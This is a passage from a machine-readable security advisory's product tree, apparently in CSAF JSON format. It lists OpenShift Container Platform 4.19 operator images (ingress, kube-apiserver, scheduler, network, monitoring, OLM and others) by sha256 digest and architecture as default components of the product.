"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:dd57d49a58a5111f6d067a3a943c9ac9b5a175972312dd83d5fbd224511c0d99_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:dd57d49a58a5111f6d067a3a943c9ac9b5a175972312dd83d5fbd224511c0d99_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:4653cd829513c12b1aa11c156b76a06d1d6dfbcd486a9045f5e58d295ce0a616_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:4653cd829513c12b1aa11c156b76a06d1d6dfbcd486a9045f5e58d295ce0a616_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:4653cd829513c12b1aa11c156b76a06d1d6dfbcd486a9045f5e58d295ce0a616_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:636cac46aae879046a02123b395762387762e921c02421fbeac623feace69c70_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:636cac46aae879046a02123b395762387762e921c02421fbeac623feace69c70_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:636cac46aae879046a02123b395762387762e921c02421fbeac623feace69c70_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:8df5c2a7eca23f5a88c99db98340446c2c0d2be2ccf22a62753e955a9da54fd5_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:8df5c2a7eca23f5a88c99db98340446c2c0d2be2ccf22a62753e955a9da54fd5_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:8df5c2a7eca23f5a88c99db98340446c2c0d2be2ccf22a62753e955a9da54fd5_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:e0db3311e3862b0fd875d6da134be4cdb3ff6d032591632c35b71aeba2cd6e3d_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:e0db3311e3862b0fd875d6da134be4cdb3ff6d032591632c35b71aeba2cd6e3d_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:e0db3311e3862b0fd875d6da134be4cdb3ff6d032591632c35b71aeba2cd6e3d_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:30a687482b427b9d447430e0e7ef60e310b9dae5032407b03da36d7795e134c9_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:30a687482b427b9d447430e0e7ef60e310b9dae5032407b03da36d7795e134c9_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:30a687482b427b9d447430e0e7ef60e310b9dae5032407b03da36d7795e134c9_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:42777662e34fa44925901dd1b8aa9537a389c167557b6287e1b01f13675363cb_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:42777662e34fa44925901dd1b8aa9537a389c167557b6287e1b01f13675363cb_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:42777662e34fa44925901dd1b8aa9537a389c167557b6287e1b01f13675363cb_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:46a134239b3b4a2792fe663a645b0c5d01a48c7db7d9c0fc71dd50c96d2fbbc4_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:46a134239b3b4a2792fe663a645b0c5d01a48c7db7d9c0fc71dd50c96d2fbbc4_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:46a134239b3b4a2792fe663a645b0c5d01a48c7db7d9c0fc71dd50c96d2fbbc4_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:7b8211056c73804d6072ec729c67cb6e77042e517009b53a0a420efb1a3893dc_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:7b8211056c73804d6072ec729c67cb6e77042e517009b53a0a420efb1a3893dc_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:7b8211056c73804d6072ec729c67cb6e77042e517009b53a0a420efb1a3893dc_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:0c307a3ef1df661bd3a634fd40ea47de440bf061f2f1631a430b61f6426903c9_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:0c307a3ef1df661bd3a634fd40ea47de440bf061f2f1631a430b61f6426903c9_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:0c307a3ef1df661bd3a634fd40ea47de440bf061f2f1631a430b61f6426903c9_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:9ba38f81d114b4fa4e3523ec46ce02bdcd4b5a122d399968bb7d6f8eb8bba271_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:9ba38f81d114b4fa4e3523ec46ce02bdcd4b5a122d399968bb7d6f8eb8bba271_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:9ba38f81d114b4fa4e3523ec46ce02bdcd4b5a122d399968bb7d6f8eb8bba271_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:bf98482d9796579be39293dcb59f424e87eff66f1af285ce773cb61b7eb7c7d7_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:bf98482d9796579be39293dcb59f424e87eff66f1af285ce773cb61b7eb7c7d7_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:bf98482d9796579be39293dcb59f424e87eff66f1af285ce773cb61b7eb7c7d7_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:fe63945e16c13db6513a214e52c7df6e510806faa3548b5c5658ae4d1c30176b_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:fe63945e16c13db6513a214e52c7df6e510806faa3548b5c5658ae4d1c30176b_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:fe63945e16c13db6513a214e52c7df6e510806faa3548b5c5658ae4d1c30176b_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:48460c041bdffd7940cb9abb2385a6eb9eda698d1155a6e11d948336fb4c81eb_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:48460c041bdffd7940cb9abb2385a6eb9eda698d1155a6e11d948336fb4c81eb_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:48460c041bdffd7940cb9abb2385a6eb9eda698d1155a6e11d948336fb4c81eb_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:9c67187eef0b78888e5299143dac7efa69d6c06fa44b9db0a92d4447f7333a0a_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:9c67187eef0b78888e5299143dac7efa69d6c06fa44b9db0a92d4447f7333a0a_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:9c67187eef0b78888e5299143dac7efa69d6c06fa44b9db0a92d4447f7333a0a_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:d0fd4fb6c3aada9546a70b24740460db48607ec9333155e04b233b7acf92bde2_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:d0fd4fb6c3aada9546a70b24740460db48607ec9333155e04b233b7acf92bde2_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:d0fd4fb6c3aada9546a70b24740460db48607ec9333155e04b233b7acf92bde2_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:eb5cee38879cba152e5979d2ec6db64e2cef6bba8dd82cbd18461aa2af072282_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:eb5cee38879cba152e5979d2ec6db64e2cef6bba8dd82cbd18461aa2af072282_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:eb5cee38879cba152e5979d2ec6db64e2cef6bba8dd82cbd18461aa2af072282_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:047391c0706f4f8c7a8c09598ed4d2900c9154cba66f633dc2df220941e978d6_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:047391c0706f4f8c7a8c09598ed4d2900c9154cba66f633dc2df220941e978d6_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:047391c0706f4f8c7a8c09598ed4d2900c9154cba66f633dc2df220941e978d6_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:3344aa2c937d0e7c24f5f7394a50bba34179fa527f9d7492b951f81fce3ac9c4_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:3344aa2c937d0e7c24f5f7394a50bba34179fa527f9d7492b951f81fce3ac9c4_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:3344aa2c937d0e7c24f5f7394a50bba34179fa527f9d7492b951f81fce3ac9c4_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:9073193ac055f63809d630f43508c41c2fa3bf07d6ca023667fd9fda5daf6117_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:9073193ac055f63809d630f43508c41c2fa3bf07d6ca023667fd9fda5daf6117_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:9073193ac055f63809d630f43508c41c2fa3bf07d6ca023667fd9fda5daf6117_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:be277357a0ad4546a23c375494eaff76ba1af97f8d77bce6d21ab722d990f749_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:be277357a0ad4546a23c375494eaff76ba1af97f8d77bce6d21ab722d990f749_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:be277357a0ad4546a23c375494eaff76ba1af97f8d77bce6d21ab722d990f749_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:2fc0e9d7cfb095ef01f513ca422a0dbd2b3fa31f8a46b8ed679550d77f3df2fa_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:2fc0e9d7cfb095ef01f513ca422a0dbd2b3fa31f8a46b8ed679550d77f3df2fa_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:2fc0e9d7cfb095ef01f513ca422a0dbd2b3fa31f8a46b8ed679550d77f3df2fa_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:4b1651037396367c71bfff638a9a8ef32aac4c570389b4d5d95a992d9eb44876_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:4b1651037396367c71bfff638a9a8ef32aac4c570389b4d5d95a992d9eb44876_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:4b1651037396367c71bfff638a9a8ef32aac4c570389b4d5d95a992d9eb44876_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:4e46a01af9e94831db7732d4747ffa011a3e634792c2076628ba225bce1baafe_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:4e46a01af9e94831db7732d4747ffa011a3e634792c2076628ba225bce1baafe_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:4e46a01af9e94831db7732d4747ffa011a3e634792c2076628ba225bce1baafe_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:c5093213a910684e94394a0bb9f931c2b62dce522bf1926e0dbf17220d166d3a_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:c5093213a910684e94394a0bb9f931c2b62dce522bf1926e0dbf17220d166d3a_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:c5093213a910684e94394a0bb9f931c2b62dce522bf1926e0dbf17220d166d3a_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:1fc4a052d1a2f71ad6d2bbf61e0a1037f7e2440debd131eace7d32d0fab11cee_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:1fc4a052d1a2f71ad6d2bbf61e0a1037f7e2440debd131eace7d32d0fab11cee_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:1fc4a052d1a2f71ad6d2bbf61e0a1037f7e2440debd131eace7d32d0fab11cee_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:54ae01b23db949ca63116514359f1d2bd5a7f7d44b3578fc821d432c4da95e68_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:54ae01b23db949ca63116514359f1d2bd5a7f7d44b3578fc821d432c4da95e68_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:54ae01b23db949ca63116514359f1d2bd5a7f7d44b3578fc821d432c4da95e68_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:7bb48785d9f7c7fbbdfea41e890259a9d3bc31fa5676bad18d497aa77da498c4_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:7bb48785d9f7c7fbbdfea41e890259a9d3bc31fa5676bad18d497aa77da498c4_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:7bb48785d9f7c7fbbdfea41e890259a9d3bc31fa5676bad18d497aa77da498c4_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:e3c50d3961173a74abdcd965f0ddf63bca5688a0ae2efece117108cbd0dff616_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:e3c50d3961173a74abdcd965f0ddf63bca5688a0ae2efece117108cbd0dff616_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:e3c50d3961173a74abdcd965f0ddf63bca5688a0ae2efece117108cbd0dff616_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:accb268a968dd5bc57d1252a01fe3595bc021d13a5f06f56d2e5a117b1d2c1f4_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:accb268a968dd5bc57d1252a01fe3595bc021d13a5f06f56d2e5a117b1d2c1f4_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:accb268a968dd5bc57d1252a01fe3595bc021d13a5f06f56d2e5a117b1d2c1f4_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:b508a70e9653143eea20c73de1605c56286a9762ce0090310955e036ea176ca2_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:b508a70e9653143eea20c73de1605c56286a9762ce0090310955e036ea176ca2_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:b508a70e9653143eea20c73de1605c56286a9762ce0090310955e036ea176ca2_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:bd5db1b792183d1ca64dd35d5ca0239b2283b61bf1e01b95efa15f6053761b89_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:bd5db1b792183d1ca64dd35d5ca0239b2283b61bf1e01b95efa15f6053761b89_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:bd5db1b792183d1ca64dd35d5ca0239b2283b61bf1e01b95efa15f6053761b89_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:d1395c330a8fae9d244430dcdeb377c9f11e1f52c0e2ea18a3347cbc981e2dbe_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:d1395c330a8fae9d244430dcdeb377c9f11e1f52c0e2ea18a3347cbc981e2dbe_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:d1395c330a8fae9d244430dcdeb377c9f11e1f52c0e2ea18a3347cbc981e2dbe_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:0f5213491694928368f537b0484d07f929f8849470db7ac791ae672dda916aed_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:0f5213491694928368f537b0484d07f929f8849470db7ac791ae672dda916aed_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:0f5213491694928368f537b0484d07f929f8849470db7ac791ae672dda916aed_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:274f0a198e8abfb43cb903534311f3e8a29cf44de59ce1768ea5f252aa9593de_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:274f0a198e8abfb43cb903534311f3e8a29cf44de59ce1768ea5f252aa9593de_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:274f0a198e8abfb43cb903534311f3e8a29cf44de59ce1768ea5f252aa9593de_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:575db31ee7397addf620644e731075e091daf9d967fa3e1b5aa916596f9025b6_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:575db31ee7397addf620644e731075e091daf9d967fa3e1b5aa916596f9025b6_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:575db31ee7397addf620644e731075e091daf9d967fa3e1b5aa916596f9025b6_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:acebc3ebf8ae744a19fbf05555531c66f567364b2cacdcde9b3ef57f35cc5bd2_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:acebc3ebf8ae744a19fbf05555531c66f567364b2cacdcde9b3ef57f35cc5bd2_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:acebc3ebf8ae744a19fbf05555531c66f567364b2cacdcde9b3ef57f35cc5bd2_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:0df81a471b525e99a5084cd3fdd23a75f9df9f1916944e877c264f35bce94b8f_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:0df81a471b525e99a5084cd3fdd23a75f9df9f1916944e877c264f35bce94b8f_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:0df81a471b525e99a5084cd3fdd23a75f9df9f1916944e877c264f35bce94b8f_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:3a37459b3a961cc1b3f3e64198885b19dd30f013b885af167ad52eb82dc1bb5f_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:3a37459b3a961cc1b3f3e64198885b19dd30f013b885af167ad52eb82dc1bb5f_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:3a37459b3a961cc1b3f3e64198885b19dd30f013b885af167ad52eb82dc1bb5f_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:4ca3976b2c2e300c52d742522bbe52e8d351bd689d60e9e8f5c8825ec711520b_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
